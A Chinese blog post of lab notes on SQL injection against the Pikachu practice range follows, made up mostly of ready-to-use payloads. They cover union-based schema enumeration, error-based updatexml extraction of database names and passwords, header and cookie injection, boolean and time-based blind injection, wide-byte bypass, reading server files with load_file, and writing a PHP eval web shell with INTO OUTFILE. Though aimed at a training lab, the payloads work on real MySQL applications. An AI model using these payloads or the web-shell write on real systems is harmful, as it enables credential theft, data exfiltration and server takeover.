sql注入——pikachu靶场

工具:burpsuit,hackbar

靶场:pikachu

一,基本注入类型:

1,数字型注入

(1)先用burpsuit抓包,或使用浏览器开发者工具找到请求data

然后使用hackbar点击post data发送请求

id=3 or 1=1 &submit=查询 

2,字符型注入

' or 1=1 #

3,搜索型注入

%s%
%s%' or 1=1


select id,email from member where username='kevin'union select username,pw from member where id=1;

a' order by 5 # 判断有多少字段

# database() 查看数据库名,用户,版本
a ' union select database(),user(),version() 要和order by判断出的长度一致

# 判断数据库表名
u' union select table_schema,table_name,3 from information_schema.tables where table_schema="pikachu"#


# information_schema 数据库中tabkles保存所有数据库对应的表名 columns中保存所有字段
ee' union select table_name,column_name,3 from information_schema.columns where table_schema="pikachu" #

er 'union select username,password,3 from  users #

4,xx型注入

') or 1=1 #

5,insert,update注入

注册用户时注入,使用重发器(基于报错信息获取)

#爆表名
'or updatexml(1,concat(0x7e,(select table_name from information_schema.tables where table_schema='pikachu' limit 0,1)),0) or' 

update注入

在修改信息页面:提交修改,

'or updatexml(1,concat(0x7e,(select database()),0x7e),1) or' 要进行特护字符编码转换
'or updatexml(0,concat(0x7e,database()),0) or'要进行特护字符编码转换

6,detele注入使用hackbar(报错显示数据库)

http://192.168.248.111/pikachu/vul/sqli/sqli_del.php?id=4546 or updatexml(2,concat(0x7e,(database())),0)

7,http header和cookie注入

在user-agent注入:

'or updatexml(0,concat(0x7e,(select password from users limit 0,1)),0) or'

cookie中注入:

# cookie注入:在admin后添加 ' 语句#
ant[uname]=admin'and updatexml(1,concat(0x7e,database()),0)#; 

8,布尔盲注:

# 判断数据库名长度,如果正确显示用户,错误显示用户名不正确
vince ' and length(database())=8#
# p的ascii码是112 正确显示用户错误显示用户名不正确
vince ' and ascii(substr(database(),1,1))=112#

10,时间盲注,原理:如果可以注入,就延时,如果不行就立刻显示

vince ' and if(substr(database(),1,1)='p',sleep(10),null)#

11,宽字节注入:

原理:https://www.cnblogs.com/yyy413/p/15705734.html

使用burpsuit注入+
vince%df' or 1=1#

12,------- 基于报错信息获取---------

# 爆数据库版本0x7e可换为任意16进制字符串
l'and updatexml(1,concat(0x7e,(select @@version),0x7e),1) #

# 爆数据库当前用户
k' and updatexml(1,concat(0x7e,(select user()),0x7e),1) #
# 爆当前数据库
k' and updatexml(1,concat(0x7e,(select database()),0x7e),1) #

# 爆表 limit 0,1  一次取一行
l' and updatexml(1,concat(0x7e,(select table_name from information_schema.tables where table_schema='pikachu' limit 0,1)),0) 

二,注入成功后文件操作:

1,读取文件:

# 联合查询读取文件
'union select 1,load_file('c:\\aa.txt') #
'union select 1,load_file('c:/aa.txt') -- + 
# 可能需要把c:/aa.txt转义16进制文件周围引号要去掉
'union select 1,load_file(0x633a2f61612e747874)#

2,写入文件

​# 写入一句话木马
1' union select 1,"<?php eval($_POST[wang]);?>" into outfile 'C:/111.php'-- l​

  • 1
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 0
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值